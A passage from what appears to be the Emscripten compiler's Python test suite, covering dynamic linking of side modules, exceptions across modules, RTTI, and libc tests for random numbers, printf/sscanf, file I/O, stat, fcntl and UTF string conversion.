P(71) P(72) P(73) P(74) P(75) P(76) P(77) P(78) P(79) P(80)
P(81) P(82) P(83) P(84) P(85) P(86) P(87) P(88) P(89) P(90)
P(91) P(92) P(93) P(94) P(95) P(96) P(97) P(98) P(99)
// prepare global variable with global initializer
int *ptr = &global_var;
int main(int argc, char *argv[]) {
printf("%d\n", *ptr);
}
''', side=r'''
#include "header.h"
int global_var = 12345;
''', expected=['12345\n'], force_c=True)
@needs_dylink
@parameterized({
'libcxx': ('libc,libc++,libmalloc,libc++abi',),
'all': ('1',),
'missing': ('libc,libmalloc', False, False, False),
'missing_assertions': ('libc,libmalloc', False, False, True),
})
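# The tuples above map onto (syslibs, expect_pass, need_reverse, assertions).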
def test_dylink_syslibs(self, syslibs, expect_pass=True, need_reverse=True, assertions=True):
# one module uses libc++, so we need to force its inclusion when it isn't linked into the main module
self.emcc_args.append('-Wno-deprecated')
self.set_setting('WARN_ON_UNDEFINED_SYMBOLS', 0)
if assertions is not None:
self.set_setting('ASSERTIONS', int(assertions))
if expect_pass:
expected = 'cout hello from side'
assert_returncode = 0
else:
if assertions:
expected = 'build the MAIN_MODULE with EMCC_FORCE_STDLIBS=1 in the environment'
else:
expected = 'Error'
assert_returncode = NON_ZERO
with env_modify({'EMCC_FORCE_STDLIBS': syslibs, 'EMCC_ONLY_FORCED_STDLIBS': '1'}):
self.dylink_test(main=r'''
void side();
int main() {
side();
return 0;
}
''', side=r'''
#include <iostream>
void side() { std::cout << "cout hello from side\n"; }
''', expected=expected, need_reverse=need_reverse, main_module=1, assert_returncode=assert_returncode)
@needs_dylink
@with_env_modify({'EMCC_FORCE_STDLIBS': 'libc++'})
def test_dylink_iostream(self):
self.dylink_test(header=r'''
#include <iostream>
#include <string>
std::string side();
''', main=r'''
#include "header.h"
int main() {
std::cout << "hello from main " << side() << std::endl;
return 0;
}
''', side=r'''
#include "header.h"
std::string side() { return "and hello from side"; }
''', expected=['hello from main and hello from side\n'])
@needs_dylink
def test_dylink_dynamic_cast(self): # issue 3465
self.dylink_test(header=r'''
class Base {
public:
virtual void printName();
};
class Derived : public Base {
public:
void printName();
};
''', main=r'''
#include "header.h"
#include <iostream>
using namespace std;
int main() {
cout << "starting main" << endl;
Base *base = new Base();
Base *derived = new Derived();
base->printName();
derived->printName();
if (dynamic_cast<Derived*>(derived)) {
cout << "OK" << endl;
} else {
cout << "KO" << endl;
}
return 0;
}
''', side=r'''
#include "header.h"
#include <iostream>
using namespace std;
void Base::printName() {
cout << "Base" << endl;
}
void Derived::printName() {
cout << "Derived" << endl;
}
''', expected=['starting main\nBase\nDerived\nOK'])
@with_both_eh_sjlj
@needs_dylink
def test_dylink_raii_exceptions(self):
self.dylink_test(main=r'''
#include <stdio.h>
extern int side();
int main() {
printf("from side: %d.\n", side());
}
''', side=r'''
#include <stdio.h>
typedef int (*ifdi)(float, double, int);
int func_with_special_sig(float a, double b, int c) {
printf("special %f %f %d\n", a, b, c);
return 1337;
}
struct DestructorCaller {
~DestructorCaller() { printf("destroy\n"); }
};
int side() {
// d has a destructor that must be called on function
// exit, which means an invoke will be used for the
// indirect call here - and the signature of that call
// is special and not present in the main module, so
// it must be generated for the side module.
DestructorCaller d;
volatile ifdi p = func_with_special_sig;
return p(2.18281, 3.14159, 42);
}
''', expected=['special 2.182810 3.141590 42\ndestroy\nfrom side: 1337.\n'])
@with_both_eh_sjlj
@needs_dylink
def test_dylink_exceptions_try_catch(self):
self.dylink_test(main=r'''
#include <stdio.h>
extern void side();
int main() {
try {
throw 3;
} catch (int n) {
printf("main: caught %d\n", n);
}
side();
return 0;
}
''', side=r'''
#include <stdio.h>
void side() {
try {
throw 5.3f;
} catch (float f) {
printf("side: caught %.1f\n", f);
}
}
''', expected=['main: caught 3\nside: caught 5.3\n'])
@with_both_eh_sjlj
@needs_dylink
def test_dylink_exceptions_try_catch_2(self):
self.dylink_test(main=r'''
#include <stdio.h>
extern void side_throw_int();
int main() {
try {
side_throw_int();
} catch (int n) {
printf("main: caught %d\n", n);
}
return 0;
}
void main_throw_float() {
throw 5.3f;
}
''', side=r'''
#include <stdio.h>
extern void main_throw_float();
void side_throw_int() {
try {
main_throw_float();
} catch (float f) {
printf("side: caught %.1f\n", f);
}
throw 3;
}
''', expected=['side: caught 5.3\nmain: caught 3\n'])
@with_both_eh_sjlj
@needs_dylink
def test_dylink_exceptions_try_catch_3(self):
main = r'''
#include <dlfcn.h>
int main() {
void* handle = dlopen("liblib.so", RTLD_LAZY);
void (*side)(void) = (void (*)(void))dlsym(handle, "side");
(side)();
return 0;
}
'''
side = r'''
#include <stdio.h>
extern "C" void side() {
try {
throw 3;
} catch (int x){
printf("side: caught int %d\n", x);
} catch (float x){
printf("side: caught float %f\n", x);
}
}
'''
create_file('liblib.cpp', side)
create_file('main.cpp', main)
self.maybe_closure()
# Mirror the dylink_testf build steps manually so the side module can be dlopen()ed at runtime.
# side settings
self.clear_setting('MAIN_MODULE')
self.set_setting('SIDE_MODULE')
out_file = self.build('liblib.cpp', js_outfile=False)
shutil.move(out_file, "liblib.so")
# main settings
self.set_setting('MAIN_MODULE', 1)
self.clear_setting('SIDE_MODULE')
expected = "side: caught int 3\n"
self.do_runf("main.cpp", expected)
@needs_dylink
@disabled('https://github.com/emscripten-core/emscripten/issues/12815')
def test_dylink_hyper_dupe(self):
self.set_setting('INITIAL_MEMORY', '64mb')
self.set_setting('ASSERTIONS', 2)
# test hyper-dynamic linking, and test duplicate warnings
create_file('third.cpp', r'''
#include <stdio.h>
int sidef() { return 36; }
int sideg = 49;
int bsidef() { return 536; }
extern void only_in_second_1(int x);
extern int second_to_third;
int third_to_second = 1337;
void only_in_third_0() {
// note we access our own globals directly, so
// it doesn't matter that overriding failed
printf("only_in_third_0: %d, %d, %d\n", sidef(), sideg, second_to_third);
only_in_second_1(2112);
}
void only_in_third_1(int x) {
printf("only_in_third_1: %d, %d, %d, %d\n", sidef(), sideg, second_to_third, x);
}
''')
if self.is_wasm():
libname = 'third.wasm'
else:
libname = 'third.js'
self.run_process([EMCC, 'third.cpp', '-o', libname, '-sSIDE_MODULE'] + self.get_emcc_args())
self.dylink_test(main=r'''
#include <stdio.h>
#include <emscripten.h>
extern int sidef();
extern int sideg;
extern int bsidef();
extern int bsideg;
extern void only_in_second_0();
extern void only_in_third_0();
int main() {
EM_ASM({
loadDynamicLibrary('%s'); // hyper-dynamic! works at least for functions (and consts not used in same block)
});
printf("sidef: %%d, sideg: %%d.\n", sidef(), sideg);
printf("bsidef: %%d.\n", bsidef());
only_in_second_0();
only_in_third_0();
}
''' % libname,
side=r'''
#include <stdio.h>
int sidef() { return 10; } // third will try to override these, but fail!
int sideg = 20;
extern void only_in_third_1(int x);
int second_to_third = 500;
extern int third_to_second;
void only_in_second_0() {
printf("only_in_second_0: %d, %d, %d\n", sidef(), sideg, third_to_second);
only_in_third_1(1221);
}
void only_in_second_1(int x) {
printf("only_in_second_1: %d, %d, %d, %d\n", sidef(), sideg, third_to_second, x);
}
''',
expected=['sidef: 10, sideg: 20.\nbsidef: 536.\nonly_in_second_0: 10, 20, 1337\nonly_in_third_1: 36, 49, 500, 1221\nonly_in_third_0: 36, 49, 500\nonly_in_second_1: 10, 20, 1337, 2112\n'],
# in wasm, we can't flip as the side would have an EM_ASM, which we don't support yet TODO
need_reverse=not self.is_wasm())
print('check warnings')
full = self.run_js('src.js')
self.assertContained("warning: symbol '_sideg' from '%s' already exists" % libname, full)
@needs_dylink
def test_dylink_load_compiled_side_module(self):
self.set_setting('FORCE_FILESYSTEM')
self.emcc_args.append('-lnodefs.js')
self.set_setting('INITIAL_MEMORY', '64mb')
# This test loads the module at runtime with loadWebAssemblyModule so we
# want to suppress the automatic loading that would otherwise be done at
# startup.
self.set_setting('NO_AUTOLOAD_DYLIBS')
self.dylink_test(main=r'''
#include <stdio.h>
#include <emscripten.h>
extern int sidef();
int main() {
EM_ASM({
FS.mkdir('/working');
FS.mount(NODEFS,{ root: '.' }, '/working');
var libData = FS.readFile('/working/liblib.so', {encoding: 'binary'});
if (!(libData instanceof Uint8Array)) {
libData = new Uint8Array(libData);
}
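// Compile the bytes ourselves and hand the resulting module to the dynamic
// loader, then expose its exports under the usual library name.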
var compiledModule = new WebAssembly.Module(libData);
var sideExports = loadWebAssemblyModule(compiledModule, {loadAsync: false, nodelete: true});
mergeLibSymbols(sideExports, 'liblib.so');
});
printf("sidef: %d.\n", sidef());
}
''',
side=r'''
#include <stdio.h>
int sidef() { return 10; }
''',
expected=['sidef: 10'],
# in wasm, we can't flip as the side would have an EM_ASM, which we don't support yet TODO
need_reverse=not self.is_wasm())
@needs_dylink
def test_dylink_dso_needed(self):
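# _test_dylink_dso_needed provides source that defines test_main(); this local
# runner appends a trivial main() that calls it and runs the result.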
def do_run(src, expected_output, emcc_args=[]):
create_file('main.c', src + 'int main() { return test_main(); }')
self.do_runf('main.c', expected_output, emcc_args=emcc_args)
self._test_dylink_dso_needed(do_run)
@needs_dylink
def test_dylink_dot_a(self):
# when a .a archive is linked into a shared module, all the .o files inside it must be force-included
create_file('third.c', 'int sidef() { return 36; }')
create_file('fourth.c', 'int sideg() { return 17; }')
self.run_process([EMCC, '-fPIC', '-c', 'third.c', '-o', 'third.o'] + self.get_emcc_args(ldflags=False))
self.run_process([EMCC, '-fPIC', '-c', 'fourth.c', '-o', 'fourth.o'] + self.get_emcc_args(ldflags=False))
self.run_process([EMAR, 'rc', 'libfourth.a', 'fourth.o'])
self.dylink_test(main=r'''
#include <stdio.h>
#include <emscripten.h>
int sidef();
int sideg();
int main() {
printf("sidef: %d, sideg: %d.\n", sidef(), sideg());
}
''',
# contents of libfourth.a must be included, even if they aren't referred to!
side=['libfourth.a', 'third.o'],
expected=['sidef: 36, sideg: 17.\n'], force_c=True)
@needs_dylink
def test_dylink_spaghetti(self):
self.dylink_test(main=r'''
#include <stdio.h>
int main_x = 72;
extern int side_x;
int adjust = side_x + 10;
int *ptr = &side_x;
struct Class {
Class() {
printf("main init sees %d, %d, %d.\n", adjust, *ptr, main_x);
}
};
Class cm;
int main() {
printf("main main sees %d, %d, %d.\n", adjust, *ptr, main_x);
return 0;
}
''', side=r'''
#include <stdio.h>
extern int main_x;
int side_x = -534;
int adjust2 = main_x + 10;
int *ptr2 = &main_x;
struct SideClass {
SideClass() {
printf("side init sees %d, %d, %d.\n", adjust2, *ptr2, side_x);
}
};
SideClass cs;
''', expected=['''\
side init sees 82, 72, -534.
main init sees -524, -534, 72.
main main sees -524, -534, 72.
''', '''\
main init sees -524, -534, 72.
side init sees 82, 72, -534.
main main sees -524, -534, 72.
'''])
@needs_make('mingw32-make')
@needs_dylink
def test_dylink_zlib(self):
self.emcc_args += ['-Wno-shift-negative-value', '-I' + test_file('third_party/zlib')]
self.set_setting('RELOCATABLE')
zlib_archive = self.get_zlib_library()
self.dylink_test(main=read_file(test_file('third_party/zlib/example.c')),
side=zlib_archive,
expected=read_file(test_file('core/test_zlib.out')),
force_c=True)
# @needs_dylink
# def test_dylink_bullet(self):
# self.emcc_args += ['-I' + test_file('bullet/src')]
# side = self.get_bullet_library(self, True)
# self.dylink_test(main=read_file(test_file('bullet/Demos/HelloWorld/HelloWorld.cpp')),
# side=side,
# expected=[read_file(test_file('bullet/output.txt')), # different roundings
# read_file(test_file('bullet/output2.txt')),
# read_file(test_file('bullet/output3.txt'))])
@needs_dylink
def test_dylink_rtti(self):
# Verify that objects created in one module can be dynamic_cast<> correctly
# in another module.
# Each module will define its own copy of certain COMDAT symbols such as
# each class's typeinfo, but at runtime they should both use the same one.
# Use LLD_REPORT_UNDEFINED to test that it works as expected with weak/COMDAT
# symbols.
self.set_setting('LLD_REPORT_UNDEFINED')
header = '''
#include <cstddef>
class Foo {
public:
virtual ~Foo() {}
};
class Bar : public Foo {
public:
virtual ~Bar() {}
};
bool is_bar(Foo* foo);
'''
main = '''
#include <stdio.h>
#include "header.h"
int main() {
Bar bar;
if (!is_bar(&bar)) {
puts("failure");
return 1;
}
puts("success");
return 0;
}
'''
side = '''
#include "header.h"
bool is_bar(Foo* foo) {
return dynamic_cast<Bar*>(foo) != nullptr;
}
'''
self.dylink_test(main=main,
side=side,
header=header,
expected='success')
@needs_dylink
def test_dylink_argv_argc(self):
# Verify that argc and argv can be sent to main when main is in a side module
self.emcc_args += ['--extern-pre-js', 'pre.js']
create_file('pre.js', '''
var Module = { arguments: ['hello', 'world!'] }
''')
self.dylink_test(
'', # main module is empty.
r'''
#include <stdio.h>
int main(int argc, char const *argv[]) {
printf("%d ", argc);
for (int i=1; i<argc; i++) printf("%s ", argv[i]);
printf("\n");
return 0;
}
''',
expected='3 hello world!',
need_reverse=False)
@needs_dylink
def test_dylink_weak(self):
# Verify that weakly defined symbols can be defined in both side module and main
# module but that only one gets used at runtime.
self.dylink_testf(test_file('core/test_dylink_weak.c'), need_reverse=False)
@node_pthreads
@needs_dylink
def test_dylink_tls(self):
self.emcc_args.append('-Wno-experimental')
self.dylink_testf(test_file('core/test_dylink_tls.c'),
need_reverse=False)
@node_pthreads
@needs_dylink
def test_dylink_tls_export(self):
self.emcc_args.append('-Wno-experimental')
self.dylink_testf(test_file('core/test_dylink_tls_export.c'),
need_reverse=False)
def test_random(self):
src = r'''#include <stdlib.h>
#include <stdio.h>
int main()
{
srandom(0xdeadbeef);
printf("%ld\n", random());
}
'''
self.do_run(src, '956867869')
def test_rand(self):
src = r'''#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
int main()
{
// we need RAND_MAX to be a bitmask (power of 2 minus 1). this assertion guarantees
// that if RAND_MAX changes, the test failure will focus attention on that issue here.
assert(RAND_MAX == 0x7fffffff);
srand(0xdeadbeef);
for(int i = 0; i < 10; ++i)
printf("%d\n", rand());
unsigned int seed = 0xdeadbeef;
for(int i = 0; i < 10; ++i)
printf("%d\n", rand_r(&seed));
bool haveEvenAndOdd = true;
for(int i = 1; i <= 30; ++i)
{
int mask = 1 << i;
if (mask > RAND_MAX) break;
bool haveEven = false;
bool haveOdd = false;
for(int j = 0; j < 1000 && (!haveEven || !haveOdd); ++j)
{
if ((rand() & mask) == 0)
haveEven = true;
else
haveOdd = true;
}
haveEvenAndOdd = haveEvenAndOdd && haveEven && haveOdd;
}
if (haveEvenAndOdd)
printf("Have even and odd!\n");
return 0;
}
'''
expected = '''490242850
2074599277
1480056542
1912638067
931112055
2110392489
2053422194
1614832492
216117595
174823244
760368382
602359081
1121118963
1291018924
1608306807
352705809
958258461
1182561381
114276303
1481323674
Have even and odd!
'''
self.do_run(src, expected)
def test_strtod(self):
self.do_core_test('test_strtod.c')
def test_strtold(self):
self.do_core_test('test_strtold.c')
def test_strtok(self):
self.do_core_test('test_strtok.c')
def test_strtol(self):
self.do_core_test('test_strtol.c')
def test_transtrcase(self):
self.do_core_test('test_transtrcase.c')
@no_wasm2js('very slow to compile')
@is_slow_test
def test_printf(self):
# needs to flush stdio streams
self.emcc_args.append('-Wno-format')
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('printf/test.c')
def test_printf_2(self):
self.do_core_test('test_printf_2.c')
def test_printf_float(self):
self.do_run_in_out_file_test('printf/test_float.c')
def test_printf_octal(self):
self.do_run_in_out_file_test('printf/test_octal.c')
def test_printf_macros(self):
self.do_core_test('test_printf_macros.c')
def test_vprintf(self):
self.do_core_test('test_vprintf.c')
def test_vsnprintf(self):
self.do_core_test('test_vsnprintf.c')
def test_printf_more(self):
self.do_core_test('test_printf_more.c')
def test_perrar(self):
self.do_core_test('test_perrar.c')
def test_atoX(self):
self.do_core_test('test_atoX.c')
def test_strstr(self):
self.do_core_test('test_strstr.c')
def test_fnmatch(self):
self.do_core_test('test_fnmatch.cpp')
def test_sscanf(self):
self.do_core_test('test_sscanf.c')
def test_sscanf_2(self):
# test parsing of both floats and doubles
for ftype in ['float', 'double']:
src = r'''
#include <stdio.h>
int main(){
char strval1[] = "1.2345678901";
char strval2[] = "1.23456789e5";
char strval3[] = "1.23456789E5";
char strval4[] = "1.2345678e-5";
char strval5[] = "1.2345678E-5";
double dblval = 1.2345678901;
double tstval;
sscanf(strval1, "%lf", &tstval);
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval2, "%lf", &tstval);
dblval = 123456.789;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval3, "%lf", &tstval);
dblval = 123456.789;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval4, "%lf", &tstval);
dblval = 0.000012345678;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval5, "%lf", &tstval);
dblval = 0.000012345678;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
return 0;
}
'''
if ftype == 'float':
self.do_run(src.replace('%lf', '%f').replace('double', 'float'), '''Pass: 1.234568 1.234568
Pass: 123456.789062 123456.789062
Pass: 123456.789062 123456.789062
Pass: 0.000012 0.000012
Pass: 0.000012 0.000012''')
else:
self.do_run(src, '''Pass: 1.234568 1.234568
Pass: 123456.789000 123456.789000
Pass: 123456.789000 123456.789000
Pass: 0.000012 0.000012
Pass: 0.000012 0.000012''')
def test_sscanf_n(self):
self.do_core_test('test_sscanf_n.c')
def test_sscanf_whitespace(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_sscanf_whitespace.c')
def test_sscanf_other_whitespace(self):
# use i16s in printf
self.set_setting('SAFE_HEAP', 0)
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_sscanf_other_whitespace.c')
def test_sscanf_3(self):
self.do_core_test('test_sscanf_3.c')
def test_sscanf_4(self):
self.do_core_test('test_sscanf_4.c')
def test_sscanf_5(self):
self.do_core_test('test_sscanf_5.c')
def test_sscanf_6(self):
self.do_core_test('test_sscanf_6.c')
def test_sscanf_skip(self):
self.do_core_test('test_sscanf_skip.c')
def test_sscanf_caps(self):
self.do_core_test('test_sscanf_caps.c')
def test_sscanf_hex(self):
self.do_core_test('test_sscanf_hex.cpp')
def test_sscanf_float(self):
self.do_core_test('test_sscanf_float.c')
def test_langinfo(self):
self.do_core_test('test_langinfo.c')
def test_files(self):
self.banned_js_engines = [config.SPIDERMONKEY_ENGINE] # closure can generate variables called 'gc', which pick up js shell stuff
if self.maybe_closure(): # Use closure here, to test we don't break FS stuff
self.emcc_args = [x for x in self.emcc_args if x != '-g'] # ensure we test --closure 1 --memory-init-file 1 (-g would disable closure)
elif '-O3' in self.emcc_args and not self.is_wasm():
print('closure 2')
self.emcc_args += ['--closure', '2'] # Use closure 2 here for some additional coverage
return self.skipTest('TODO: currently skipped because CI runs out of memory running Closure in this test!')
self.emcc_args += ['--pre-js', 'pre.js']
self.set_setting('FORCE_FILESYSTEM')
print('base', self.emcc_args)
create_file('pre.js', '''
/** @suppress{checkTypes}*/
Module = {
'noFSInit': true,
'preRun': function() {
FS.createLazyFile('/', 'test.file', 'test.file', true, false);
// Test FS_* exporting
Module['FS_createDataFile']('/', 'somefile.binary', [100, 200, 50, 25, 10, 77, 123], true, false, false); // 200 becomes -56, since signed chars are used in memory
var test_files_input = 'hi there!';
var test_files_input_index = 0;
FS.init(function() {
return test_files_input.charCodeAt(test_files_input_index++) || null;
});
}
};
''')
create_file('test.file', 'some data')
mem_file = 'files.js.mem'
try_delete(mem_file)
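# Strip engine/binaryen notice lines from the output so only the program's own
# stdout is compared against the expected text.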
def clean(out):
return '\n'.join([line for line in out.split('\n') if 'binaryen' not in line and 'wasm' not in line and 'so not running' not in line])
self.do_runf(test_file('files.cpp'), ('size: 7\ndata: 100,-56,50,25,10,77,123\nloop: 100 -56 50 25 10 77 123 \ninput:hi there!\ntexto\n$\n5 : 10,30,20,11,88\nother=some data.\nseeked=me da.\nseeked=ata.\nseeked=ta.\nfscanfed: 10 - hello\n5 bytes to dev/null: 5\nok.\ntexte\n', 'size: 7\ndata: 100,-56,50,25,10,77,123\nloop: 100 -56 50 25 10 77 123 \ninput:hi there!\ntexto\ntexte\n$\n5 : 10,30,20,11,88\nother=some data.\nseeked=me da.\nseeked=ata.\nseeked=ta.\nfscanfed: 10 - hello\n5 bytes to dev/null: 5\nok.\n'),
output_nicerizer=clean)
if self.uses_memory_init_file():
self.assertExists(mem_file)
def test_files_m(self):
# Test for Module.stdin etc.
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
create_file('pre.js', '''
Module = {
data: [10, 20, 40, 30],
stdin: function() { return Module.data.pop() || null },
stdout: function(x) { out('got: ' + x) }
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
src = r'''
#include <stdio.h>
#include <unistd.h>
int main () {
int c;
fprintf(stderr, "isatty? %d,%d,%d\n", isatty(fileno(stdin)), isatty(fileno(stdout)), isatty(fileno(stderr)));
while ((c = fgetc(stdin)) != EOF) {
putc(c+5, stdout);
}
return 0;
}
'''
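# Drop engine warnings and binaryen notices before comparing output.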
def clean(out):
return '\n'.join(l for l in out.splitlines() if 'warning' not in l and 'binaryen' not in l)
self.do_run(src, ('got: 35\ngot: 45\ngot: 25\ngot: 15\nisatty? 0,0,1\n', 'got: 35\ngot: 45\ngot: 25\ngot: 15\nisatty? 0,0,1', 'isatty? 0,0,1\ngot: 35\ngot: 45\ngot: 25\ngot: 15'), output_nicerizer=clean)
def test_mount(self):
self.set_setting('FORCE_FILESYSTEM')
self.do_runf(test_file('fs/test_mount.c'), 'success')
def test_getdents64(self):
self.do_runf(test_file('fs/test_getdents64.cpp'), '..')
def test_getdents64_special_cases(self):
# https://bugs.chromium.org/p/v8/issues/detail?id=6881
self.banned_js_engines = [config.V8_ENGINE]
self.do_run_in_out_file_test('fs/test_getdents64_special_cases.cpp')
def test_getcwd_with_non_ascii_name(self):
# https://bugs.chromium.org/p/v8/issues/detail?id=6881
self.banned_js_engines = [config.V8_ENGINE]
self.do_run_in_out_file_test('fs/test_getcwd_with_non_ascii_name.cpp')
def test_proc_self_fd(self):
self.do_run_in_out_file_test('fs/test_proc_self_fd.c')
def test_fwrite_0(self):
self.do_core_test('test_fwrite_0.c')
def test_fgetc_ungetc(self):
print('TODO: update this test once the musl ungetc-on-EOF-stream bug is fixed upstream and reaches us')
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
print(fs)
self.emcc_args = orig_compiler_opts + ['-D' + fs]
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('stdio/test_fgetc_ungetc.c'), 'success', js_engines=[config.NODE_JS])
def test_fgetc_unsigned(self):
src = r'''
#include <stdio.h>
int main() {
FILE *file = fopen("file_with_byte_234.txt", "rb");
int c = fgetc(file);
printf("*%d\n", c);
}
'''
create_file('file_with_byte_234.txt', b'\xea', binary=True)
self.emcc_args += ['--embed-file', 'file_with_byte_234.txt']
self.do_run(src, '*234\n')
def test_fgets_eol(self):
src = r'''
#include <stdio.h>
char buf[32];
int main()
{
const char *r = "SUCCESS";
FILE *f = fopen("eol.txt", "r");
while (fgets(buf, 32, f) != NULL) {
if (buf[0] == '\0') {
r = "FAIL";
break;
}
}
printf("%s\n", r);
fclose(f);
return 0;
}
'''
create_file('eol.txt', b'\n', binary=True)
self.emcc_args += ['--embed-file', 'eol.txt']
self.do_run(src, 'SUCCESS\n')
def test_fscanf(self):
create_file('three_numbers.txt', '-1 0.1 -.1')
src = r'''
#include <stdio.h>
#include <assert.h>
#include <float.h>
int main()
{
float x = FLT_MAX, y = FLT_MAX, z = FLT_MAX;
FILE* fp = fopen("three_numbers.txt", "r");
if (fp) {
int match = fscanf(fp, " %f %f %f ", &x, &y, &z);
printf("match = %d\n", match);
printf("x = %0.1f, y = %0.1f, z = %0.1f\n", x, y, z);
} else {
printf("failed to open three_numbers.txt\n");
}
return 0;
}
'''
self.emcc_args += ['--embed-file', 'three_numbers.txt']
self.do_run(src, 'match = 3\nx = -1.0, y = 0.1, z = -0.1\n')
def test_fscanf_2(self):
create_file('a.txt', '''1/2/3 4/5/6 7/8/9
''')
self.emcc_args += ['--embed-file', 'a.txt']
self.do_run(r'''#include <cstdio>
#include <iostream>
using namespace std;
int
main(int argc, char **argv) {
cout << "fscanf test" << endl;
FILE * file;
file = fopen("a.txt", "rb");
int vertexIndex[4];
int normalIndex[4];
int uvIndex[4];
int matches = fscanf(file, "%d/%d/%d %d/%d/%d %d/%d/%d %d/%d/%d\n", &vertexIndex[0], &uvIndex[0], &normalIndex[0], &vertexIndex [1], &uvIndex[1], &normalIndex[1], &vertexIndex[2], &uvIndex[2], &normalIndex[2], &vertexIndex[3], &uvIndex[3], &normalIndex[3]);
cout << matches << endl;
return 0;
}
''', 'fscanf test\n9\n')
def test_fileno(self):
create_file('empty.txt', '')
src = r'''
#include <stdio.h>
#include <unistd.h>
int main()
{
FILE* fp = fopen("empty.txt", "r");
if (fp) {
printf("%d\n", fileno(fp));
} else {
printf("failed to open empty.txt\n");
}
return 0;
}
'''
self.emcc_args += ['--embed-file', 'empty.txt']
self.do_run(src, '3\n')
@also_with_noderawfs
def test_readdir(self):
self.do_run_in_out_file_test('dirent/test_readdir.c')
@also_with_wasm_bigint
def test_readdir_empty(self):
self.do_run_in_out_file_test('dirent/test_readdir_empty.c')
def test_stat(self):
self.do_runf(test_file('stat/test_stat.c'), 'success')
self.verify_in_strict_mode('test_stat.js')
def test_fstatat(self):
self.do_runf(test_file('stat/test_fstatat.c'), 'success')
def test_stat_chmod(self):
self.do_runf(test_file('stat/test_chmod.c'), 'success')
def test_stat_mknod(self):
self.do_runf(test_file('stat/test_mknod.c'), 'success')
def test_fcntl(self):
self.add_pre_run("FS.createDataFile('/', 'test', 'abcdef', true, true, false);")
self.do_run_in_out_file_test('fcntl/test_fcntl.c')
def test_fcntl_open(self):
self.do_run_in_out_file_test('fcntl/test_fcntl_open.c')
@also_with_wasm_bigint
def test_fcntl_misc(self):
self.add_pre_run("FS.createDataFile('/', 'test', 'abcdef', true, true, false);")
self.do_run_in_out_file_test('fcntl/test_fcntl_misc.c')
def test_poll(self):
self.add_pre_run('''
var dummy_device = FS.makedev(64, 0);
FS.registerDevice(dummy_device, {});
FS.createDataFile('/', 'file', 'abcdef', true, true, false);
FS.mkdev('/device', dummy_device);
''')
self.do_core_test('test_poll.c')
def test_statvfs(self):
self.do_core_test('test_statvfs.c')
def test_libgen(self):
self.do_core_test('test_libgen.c')
def test_utime(self):
self.do_runf(test_file('utime/test_utime.c'), 'success')
def test_futimens(self):
self.do_runf(test_file('utime', 'test_futimens.c'), 'success')
@no_minimal_runtime('MINIMAL_RUNTIME does not have getValue() and setValue() (TODO add it to a JS library function to get it in)')
def test_utf(self):
self.banned_js_engines = [config.SPIDERMONKEY_ENGINE] # only node handles utf well
self.set_setting('EXPORTED_FUNCTIONS', ['_main', '_malloc', '_free'])
self.set_setting('EXPORTED_RUNTIME_METHODS', ['getValue', 'setValue', 'UTF8ToString', 'stringToUTF8'])
self.do_core_test('test_utf.c')
def test_utf32(self):
if self.get_setting('MINIMAL_RUNTIME'):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$UTF32ToString', '$stringToUTF32', '$lengthBytesUTF32'])
else:
self.set_setting('EXPORTED_RUNTIME_METHODS', ['UTF32ToString', 'stringToUTF32', 'lengthBytesUTF32'])
self.do_runf(test_file('utf32.cpp'), 'OK.')
self.do_runf(test_file('utf32.cpp'), 'OK.', args=['-fshort-wchar'])
def test_utf16(self):
self.do_runf(test_file('core/test_utf16.cpp'), 'OK.')
def test_utf8(self):
if self.get_setting('MINIMAL_RUNTIME'):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$AsciiToString', '$stringToAscii', '$writeAsciiToMemory'])
else:
self.set_setting('EXPORTED_RUNTIME_METHODS',
['UTF8ToString', 'stringToUTF8', 'AsciiToString', 'stringToAscii'])
self.do_runf(test_file('utf8.cpp'), 'OK.')
@also_with_wasm_bigint
def test_utf8_textdecoder(self):
self.set_setting('EXPORTED_RUNTIME_METHODS', ['UTF8ToString', 'stringToUTF8'])
self.emcc_args += ['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt']
self.do_runf(test_file('benchmark_utf8.cpp'), 'OK.')
# Test that invalid character in UTF8 does not cause decoding to crash.
def test_utf8_invalid(self):
self.set_setting('EXPORTED_RUNTIME_METHODS', ['UTF8ToString', 'stringToUTF8'])
for decoder_mode in [[], ['-sTEXTDECODER']]:
self.emcc_args += decoder_mode
print(str(decoder_mode))
self.do_runf(test_file('utf8_invalid.cpp'), 'OK.')
# Test that invalid character in UTF8 does not cause decoding to crash.
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_utf8_invalid(self):
self.set_setting('EXPORTED_RUNTIME_METHODS', ['UTF8ToString', 'stringToUTF8'])
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
for decoder_mode in [False, True]:
self.set_setting('TEXTDECODER', decoder_mode)
print(str(decoder_mode))
self.do_runf(test_file('utf8_invalid.cpp'), 'OK.')
def test_utf16_textdecoder(self):
self.set_setting('EXPORTED_RUNTIME_METHODS', ['UTF16ToString', 'stringToUTF16', 'lengthBytesUTF16'])
self.emcc_args += ['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt']
self.do_runf(test_file('benchmark_utf16.cpp'), 'OK.')
def test_wprintf(self):
